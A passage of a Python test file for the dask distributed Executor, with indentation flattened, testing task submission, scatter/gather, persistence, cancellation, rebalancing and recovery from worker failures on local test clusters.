x = e1.submit(inc, 1)
y = e2.submit(inc, 2)
xx = yield x._result()
yy = yield y._result()
assert xx == 2
assert yy == 3
yield e1._restart()
assert x.cancelled()
assert y.cancelled()
yield e1._shutdown(fast=True)
yield e2._shutdown(fast=True)
@gen_cluster(executor=True)
def test_async_compute(e, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = e.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = yield e._gather([yy, zz])
assert result == [2, 0]
assert isinstance(e.compute(y), Future)
assert isinstance(e.compute([y]), (tuple, list))
@gen_cluster(executor=True)
def test_async_compute_with_scatter(e, s, a, b):
d = yield e._scatter({('x', 1): 1, ('y', 1): 2})
x, y = d[('x', 1)], d[('y', 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = e.compute(z)
[result] = yield e._gather([zz])
assert result == 2 + 3
def test_sync_compute(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = e.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(executor=True)
def test_remote_scatter_gather(e, s, a, b):
x, y, z = yield e._scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = yield e._gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, executor=True)
def test_remote_submit_on_Future(e, s, a, b):
x = e.submit(lambda x: x + 1, 1)
y = e.submit(lambda x: x + 1, x)
result = yield y._result()
assert result == 3
def test_start_is_idempotent(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
e.start()
e.start()
e.start()
x = e.submit(inc, 1)
assert x.result() == 2
@gen_cluster(executor=True)
def test_executor_with_scheduler(e, s, a, b):
assert s.ncores == {a.address: a.ncores, b.address: b.ncores}
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y)
result = yield x._result()
assert result == 1 + 1
result = yield z._result()
assert result == 1 + 1 + 1 + 2
a, b, c = yield e._scatter([1, 2, 3])
aa, bb, xx = yield e._gather([a, b, x])
assert (aa, bb, xx) == (1, 2, 2)
result = yield e._get({'x': (inc, 1), 'y': (add, 'x', 10)}, 'y')
assert result == 12
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_allow_restrictions(e, s, a, b):
x = e.submit(inc, 1, workers=a.ip)
yield x._result()
assert s.who_has[x.key] == {a.address}
assert not s.loose_restrictions
x = e.submit(inc, 2, workers=a.ip, allow_other_workers=True)
yield x._result()
assert s.who_has[x.key] == {a.address}
assert x.key in s.loose_restrictions
L = e.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
yield _wait(L)
assert all(s.who_has[f.key] == {a.address} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
"""
x = e.submit(inc, 14, workers='127.0.0.3')
with ignoring(gen.TimeoutError):
yield gen.with_timeout(timedelta(seconds=0.1), x._result())
assert False
assert not s.who_has[x.key]
assert x.key not in s.loose_restrictions
"""
x = e.submit(inc, 15, workers='127.0.0.3', allow_other_workers=True)
yield x._result()
assert s.who_has[x.key]
assert x.key in s.loose_restrictions
L = e.map(inc, range(15, 25), workers='127.0.0.3', allow_other_workers=True)
yield _wait(L)
assert all(s.who_has[f.key] for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
e.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
e.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
e.submit(inc, 20, workers='127.0.0.1', allow_other_workers='Hello!')
with pytest.raises(TypeError):
e.map(inc, [20], workers='127.0.0.1', allow_other_workers='Hello!')
@pytest.mark.skipif('True', reason='because')
def test_bad_address():
try:
Executor('123.123.123.123:1234', timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Executor('127.0.0.1:1234', timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(executor=True)
def test_long_error(e, s, a, b):
def bad(x):
raise ValueError('a' * 100000)
x = e.submit(bad, 10)
try:
yield x._result()
except ValueError as e:
assert len(str(e)) < 100000
tb = yield x._traceback()
assert all(len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str))
@gen_cluster(executor=True)
def test_map_on_futures_with_kwargs(e, s, a, b):
def f(x, y=10):
return x + y
futures = e.map(inc, range(10))
futures2 = e.map(f, futures, y=20)
results = yield e._gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = e.submit(inc, 100)
future2 = e.submit(f, future, y=200)
result = yield future2._result()
assert result == 100 + 1 + 200
@gen_cluster(Worker=Nanny, timeout=60, executor=True)
def test_failed_worker_without_warning(e, s, a, b):
L = e.map(inc, range(10))
yield _wait(L)
a.process.terminate()
start = time()
while not a.process.is_alive():
yield gen.sleep(0.01)
assert time() - start < 10
yield gen.sleep(0.5)
start = time()
while len(s.ncores) < 2:
yield gen.sleep(0.01)
assert time() - start < 10
yield _wait(L)
L2 = e.map(inc, range(10, 20))
yield _wait(L2)
assert all(len(keys) > 0 for keys in s.has_what.values())
ncores2 = s.ncores.copy()
yield e._restart()
L = e.map(inc, range(10))
yield _wait(L)
assert all(len(keys) > 0 for keys in s.has_what.values())
assert not (set(ncores2) & set(s.ncores)) # no overlap
class BadlySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(executor=True)
def test_badly_serialized_input(e, s, a, b):
o = BadlySerializedObject()
future = e.submit(inc, o)
futures = e.map(inc, range(10))
L = yield e._gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == 'error'
@pytest.mark.skipif('True', reason="")
def test_badly_serialized_input_stderr(capsys, loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
o = BadlySerializedObject()
future = e.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if 'hello!' in err:
break
assert time() - start < 20
assert future.status == 'error'
@gen_cluster(executor=True)
def test_repr(e, s, a, b):
assert s.ip in str(e)
assert str(s.port) in repr(e)
@gen_cluster(executor=True)
def test_forget_simple(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield _wait([x, y, z])
assert not s.waiting_data[x.key]
assert not s.waiting_data[y.key]
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=e.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=e.id)
for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,
s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,
s.released, s.keyorder, s.exceptions, s.who_wants,
s.exceptions_blame, s.nbytes]:
assert x.key not in coll
assert z.key not in coll
assert z.key not in s.dependents[y.key]
s.client_releases_keys(keys=[y.key], client=e.id)
assert not s.tasks
@gen_cluster(executor=True)
def test_forget_complex(e, s, A, B):
a, b, c, d = yield e._scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
yield _wait([a,b,c,d,ab,ac,cd,acab])
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac,cd]}
assert b.key not in s.who_has
start = time()
while b.key in A.data or b.key in B.data:
yield gen.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd]}
@gen_cluster(executor=True)
def test_forget_in_flight(e, s, A, B):
a, b, c, d = [delayed(slowinc)(i) for i in range(4)]
ab = delayed(slowadd)(a, b)
cd = delayed(slowadd)(c, d)
ac = delayed(slowadd)(a, c)
acab = delayed(slowadd)(ac, ab)
x, y = e.compute([ac, acab])
s.validate()
for i in range(5):
yield gen.sleep(0.01)
s.validate()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
assert k not in s.waiting
assert k not in s.who_has
@gen_cluster(executor=True)
def test_forget_errors(e, s, a, b):
x = e.submit(div, 1, 0)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=e.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=e.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=e.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(loop):
with cluster(nworkers=3) as (s, [a, b, c]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
s = str(e)
r = repr(e)
assert e.scheduler.ip in s
assert str(e.scheduler.port) in r
assert str(3) in s # nworkers
assert 'cores' in s
@gen_cluster(executor=True)
def test_waiting_data(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield _wait([x, y, z])
assert x.key not in s.waiting_data[x.key]
assert y.key not in s.waiting_data[y.key]
assert not s.waiting_data[x.key]
assert not s.waiting_data[y.key]
@gen_cluster()
def test_multi_executor(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
assert set(s.streams) == {e.id, f.id}
x = e.submit(inc, 1)
y = f.submit(inc, 2)
y2 = e.submit(inc, 2)
assert y.key == y2.key
yield _wait([x, y])
assert s.wants_what == {e.id: {x.key, y.key}, f.id: {y.key}}
assert s.who_wants == {x.key: {e.id}, y.key: {e.id, f.id}}
yield e._shutdown()
start = time()
while e.id in s.wants_what:
yield gen.sleep(0.01)
assert time() < start + 5
assert e.id not in s.wants_what
assert e.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
yield f._shutdown()
assert not s.tasks
@gen_cluster(executor=True, timeout=60)
def test_broken_worker_during_computation(e, s, a, b):
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
start = time()
while len(s.ncores) < 3:
yield gen.sleep(0.01)
assert time() < start + 5
L = e.map(inc, range(256))
for i in range(8):
L = e.map(add, *zip(*partition_all(2, L)))
from random import random
yield gen.sleep(random() / 2)
n.process.terminate()
yield gen.sleep(random() / 2)
n.process.terminate()
result = yield e._gather(L)
assert isinstance(result[0], int)
yield n._close()
@gen_cluster()
def test_cleanup_after_broken_executor_connection(s, a, b):
def f(ip, port):
e = Executor((ip, port))
x = e.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
proc = Process(target=f, args=(s.ip, s.port))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
@gen_cluster()
def test_multi_garbage_collection(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
x = e.submit(inc, 1)
y = f.submit(inc, 2)
y2 = e.submit(inc, 2)
assert y.key == y2.key
yield _wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {e.id: {y.key}, f.id: {y.key}}
assert s.who_wants == {y.key: {e.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
yield gen.sleep(0.01)
assert time() < start + 5
yield gen.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {e.id: {y.key}, f.id: set()}
assert s.who_wants == {y.key: {e.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test__broadcast(e, s, a, b):
x, y = yield e._scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test__broadcast_integer(e, s, *workers):
x, y = yield e._scatter([1, 2], broadcast=2)
assert len(s.who_has[x.key]) == 2
assert len(s.who_has[y.key]) == 2
@gen_cluster(executor=True)
def test__broadcast_dict(e, s, a, b):
d = yield e._scatter({'x': 1}, broadcast=True)
assert a.data == b.data == {'x': 1}
def test_broadcast(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x, y = e.scatter([1, 2], broadcast=True)
has_what = sync(e.loop, e.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
'127.0.0.1:%d' % a['port']: {x.key, y.key},
'127.0.0.1:%d' % b['port']: {x.key, y.key}}
[z] = e.scatter([3], broadcast=True, workers=['127.0.0.1:%d' % a['port']])
has_what = sync(e.loop, e.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
'127.0.0.1:%d' % a['port']: {x.key, y.key, z.key},
'127.0.0.1:%d' % b['port']: {x.key, y.key}}
@gen_cluster(executor=True)
def test__cancel(e, s, a, b):
x = e.submit(slowinc, 1)
y = e.submit(slowinc, x)
while y.key not in s.tasks:
yield gen.sleep(0.01)
yield e._cancel([x])
assert x.cancelled()
assert 'cancel' in str(x)
s.validate()
start = time()
while not y.cancelled():
yield gen.sleep(0.01)
assert time() < start + 5
assert not s.tasks
assert not s.who_has
s.validate()
@gen_cluster()
def test__cancel_multi_client(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
f = Executor((s.ip, s.port), start=False)
yield f._start()
x = e.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
yield e._cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
out = yield y._result()
assert out == 2
with pytest.raises(CancelledError):
yield x._result()
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test__cancel_collection(e, s, a, b):
import dask.bag as db
L = e.map(double, [[1], [2], [3]])
x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3)
yield e._cancel(x)
yield e._cancel([x])
assert all(f.cancelled() for f in L)
assert not s.tasks
assert not s.who_has
def test_cancel(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(slowinc, 1)
y = e.submit(slowinc, x)
z = e.submit(slowinc, y)
e.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(executor=True)
def test_future_type(e, s, a, b):
x = e.submit(inc, 1)
yield _wait([x])
assert x.type == int
assert 'int' in str(x)
@gen_cluster(executor=True)
def test_traceback_clean(e, s, a, b):
x = e.submit(div, 1, 0)
try:
yield x._result()
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert 'scheduler' not in tb.tb_frame.f_code.co_filename
assert 'worker' not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(executor=True)
def test_map_queue(e, s, a, b):
from distributed.compatibility import Queue, isqueue
q_1 = Queue(maxsize=2)
q_2 = e.map(inc, q_1)
assert isqueue(q_2)
assert not q_2.maxsize
q_3 = e.map(double, q_2, maxsize=3)
assert isqueue(q_3)
assert q_3.maxsize == 3
q_4 = yield e._gather(q_3)
assert isqueue(q_4)
q_1.put(1)
f = q_4.get()
assert isinstance(f, Future)
result = yield f._result()
assert result == (1 + 1) * 2
@gen_cluster(executor=True)
def test_map_iterator_with_return(e, s, a, b):
def g():
yield 1
yield 2
raise StopIteration(3) # py2.7 compat.
f1 = e.map(lambda x: x, g())
assert isinstance(f1, Iterator)
start = time() # ensure that we compute eagerly
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
g1 = g()
try:
while True:
f = next(f1)
n = yield f._result()
assert n == next(g1)
except StopIteration as e:
with pytest.raises(StopIteration) as exc_info:
next(g1)
assert e.args == exc_info.value.args
@gen_cluster(executor=True)
def test_map_iterator(e, s, a, b):
x = iter([1, 2, 3])
y = iter([10, 20, 30])
f1 = e.map(add, x, y)
assert isinstance(f1, Iterator)
start = time() # ensure that we compute eagerly
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
f2 = e.map(double, f1)
assert isinstance(f2, Iterator)
future = next(f2)
result = yield future._result()
assert result == (1 + 10) * 2
futures = list(f2)
results = []
for f in futures:
r = yield f._result()
results.append(r)
assert results == [(2 + 20) * 2, (3 + 30) * 2]
items = enumerate(range(10))
futures = e.map(lambda x: x, items)
assert isinstance(futures, Iterator)
result = yield next(futures)._result()
assert result == (0, 0)
futures_l = list(futures)
results = []
for f in futures_l:
r = yield f._result()
results.append(r)
assert results == [(i, i) for i in range(1,10)]
@gen_cluster(executor=True)
def test_map_infinite_iterators(e, s, a, b):
futures = e.map(add, [1, 2], itertools.repeat(10))
assert len(futures) == 2
def test_map_iterator_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
items = enumerate(range(10))
futures = e.map(lambda x: x, items)
next(futures).result() == (0, 0)
@gen_cluster(executor=True)
def test_map_differnet_lengths(e, s, a, b):
assert len(e.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
ensure_default_get(e)
ensure_default_get(e)
ensure_default_get(e)
ensure_default_get(e)
assert _globals['get'] == e.get
out, err = capsys.readouterr()
assert len(out.strip().split('\n')) == 1
assert _globals.get('get') != e.get
@gen_cluster(timeout=60, executor=True)
def test_async_persist(e, s, a, b):
from dask.imperative import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = e.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y._keys() == yy._keys()
assert w._keys() == ww._keys()
while y.key not in s.tasks and w.key not in s.tasks:
yield gen.sleep(0.01)
assert s.who_wants[y.key] == {e.id}
assert s.who_wants[w.key] == {e.id}
yyf, wwf = e.compute([yy, ww])
yyy, www = yield e._gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(e.persist(y), Delayed)
assert isinstance(e.persist([y]), (list, tuple))
@gen_cluster(executor=True)
def test__persist(e, s, a, b):
pytest.importorskip('dask.array')
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = e.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy._keys() == y._keys()
g, h = e.compute([y, yy])
gg, hh = yield e._gather([g, h])
assert (gg == hh).all()
def test_persist(loop):
pytest.importorskip('dask.array')
import dask.array as da
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = e.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy._keys() == y._keys()
assert (yy.compute(get=e.get) == y.compute(get=e.get)).all()
@gen_cluster(timeout=60, executor=True)
def test_long_traceback(e, s, a, b):
from distributed.core import dumps
n = sys.getrecursionlimit()
sys.setrecursionlimit(500)
try:
x = e.submit(deep, 1000)
yield _wait([x])
assert len(dumps(e.futures[x.key]['traceback'])) < 10000
assert isinstance(e.futures[x.key]['exception'], RuntimeError)
finally:
sys.setrecursionlimit(n)
@gen_cluster(executor=True)
def test_wait_on_collections(e, s, a, b):
import dask.bag as db
L = e.map(double, [[1], [2], [3]])
x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3)
yield _wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(executor=True)
def test_futures_of(e, s, a, b):
x, y, z = e.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
import dask.bag as db
b = db.Bag({('b', i): f for i, f in enumerate([x, y, z])}, 'b', 3)
assert set(futures_of(b)) == {x, y, z}
@gen_cluster(executor=True)
def test_futures_of_cancelled_raises(e, s, a, b):
x = e.submit(inc, 1)
yield e._cancel([x])
with pytest.raises(CancelledError):
yield x._result()
with pytest.raises(CancelledError):
yield e._get({'x': (inc, x), 'y': (inc, 2)}, ['x', 'y'])
with pytest.raises(CancelledError):
e.submit(inc, x)
with pytest.raises(CancelledError):
e.submit(add, 1, y=x)
with pytest.raises(CancelledError):
e.map(add, [1], y=x)
assert 'y' not in s.tasks
@gen_cluster(ncores=[('127.0.0.1', 1)], executor=True)
def test_dont_delete_recomputed_results(e, s, w):
x = e.submit(inc, 1) # compute first time
yield _wait([x])
x.__del__() # trigger garbage collection
xx = e.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
yield gen.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
yield gen.sleep(0.01)
@gen_cluster(ncores=[], executor=True)
def test_fatally_serialized_input(e, s):
o = FatallySerializedObject()
future = e.submit(inc, o)
while not s.tasks:
yield gen.sleep(0.01)
@gen_cluster(executor=True)
def test_balance_tasks_by_stacks(e, s, a, b):
x = e.submit(inc, 1)
yield _wait(x)
y = e.submit(inc, 2)
yield _wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(executor=True)
def test_run(e, s, a, b):
results = yield e._run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = yield e._run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = yield e._run(inc, 1, workers=[])
assert results == {}
def test_run_sync(loop):
def func(x, y=10):
return x + y
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
result = e.run(func, 1, y=2)
assert result == {'127.0.0.1:%d' % a['port']: 3,
'127.0.0.1:%d' % b['port']: 3}
result = e.run(func, 1, y=2, workers=['127.0.0.1:%d' % a['port']])
assert result == {'127.0.0.1:%d' % a['port']: 3}
def test_run_exception(loop):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type) as excinfo:
e.run(raise_exception, exc_type, 'informative message')
assert 'informative message' in str(excinfo.value)
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = '127.0.0.1:%d' % a['port']
b_addr = '127.0.0.1:%d' % b['port']
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
d = e.ncores()
assert d == {a_addr: 1, b_addr: 1}
d = e.ncores([a_addr])
assert d == {a_addr: 1}
d = e.ncores(a_addr)
assert d == {a_addr: 1}
d = e.ncores(('127.0.0.1', a['port']))
assert d == {a_addr: 1}
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(inc, 3)
wait([x, y, z])
d = e.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = e.who_has([x, y])
assert set(d) == {x.key, y.key}
d = e.who_has(x)
assert set(d) == {x.key}
d = e.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = e.has_what([a_addr])
assert set(d) == {a_addr}
d = e.has_what(a_addr)
assert set(d) == {a_addr}
d = e.has_what(('127.0.0.1', a['port']))
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
incs = e.map(inc, [1, 2, 3])
doubles = e.map(double, [1, 2, 3])
wait(incs + doubles)
assert e.nbytes(summary=False) == {k.key: sizeof(1)
for k in incs + doubles}
assert e.nbytes(summary=True) == {'inc': sizeof(1) * 3,
'double': sizeof(1) * 3}
@gen_cluster(executor=True)
def test_diagnostic_nbytes(e, s, a, b):
incs = e.map(inc, [1, 2, 3])
doubles = e.map(double, [1, 2, 3])
yield _wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1)
for k in incs + doubles}
assert s.get_nbytes(summary=True) == {'inc': sizeof(1) * 3,
'double': sizeof(1) * 3}
@gen_test()
def test_worker_aliases():
s = Scheduler()
s.start(0)
a = Worker(s.ip, s.port, name='alice')
b = Worker(s.ip, s.port, name='bob')
yield [a._start(), b._start()]
e = Executor((s.ip, s.port), start=False)
yield e._start()
L = e.map(inc, range(10), workers='alice')
yield _wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
yield e._shutdown()
yield [a._close(), b._close()]
yield s.close()
def test_persist_get_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = e.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute(get=e.get) == ((1+1) + (2+2)) + 10
@gen_cluster(executor=True)
def test_persist_get(e, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = e.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
yield gen.sleep(0.5)
result = yield e._get(xxyy3.dask, xxyy3._keys())
assert result[0] == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
result = yield e.compute(xxyy3)._result()
assert result == ((1+1) + (2+2)) + 10
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="num_fds not supported on windows")
def test_executor_num_fds(loop):
psutil = pytest.importorskip('psutil')
with cluster() as (s, [a, b]):
proc = psutil.Process()
before = proc.num_fds()
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
during = proc.num_fds()
after = proc.num_fds()
assert before >= after
@gen_cluster()
def test_startup_shutdown_startup(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
yield e._shutdown()
e = Executor((s.ip, s.port), start=False)
yield e._start()
yield e._shutdown()
def test_startup_shutdown_startup_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
pass
sleep(0.1)
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
pass
with Executor(('127.0.0.1', s['port'])) as e:
pass
sleep(0.1)
with Executor(('127.0.0.1', s['port'])) as e:
pass
@gen_cluster(executor=True)
def test_badly_serialized_exceptions(e, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException('hello world')
x = e.submit(f)
try:
result = yield x._result()
except Exception as e:
assert 'hello world' in str(e)
else:
assert False
@gen_cluster(executor=True)
def test_rebalance(e, s, a, b):
x, y = yield e._scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
yield e._rebalance()
assert len(b.data) == 1
assert s.has_what[b.address] == set(b.data)
assert b.address in s.who_has[x.key] or b.address in s.who_has[y.key]
assert len(a.data) == 1
assert s.has_what[a.address] == set(a.data)
assert (a.address not in s.who_has[x.key] or
a.address not in s.who_has[y.key])
@gen_cluster(ncores=[('127.0.0.1', 1)] * 4, executor=True)
def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = yield e._scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
yield e._rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
yield e._rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
@gen_cluster(executor=True)
def test_rebalance_execution(e, s, a, b):
futures = e.map(inc, range(10), workers=a.address)
yield e._rebalance(futures)
assert len(a.data) == len(b.data) == 5
def test_rebalance_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
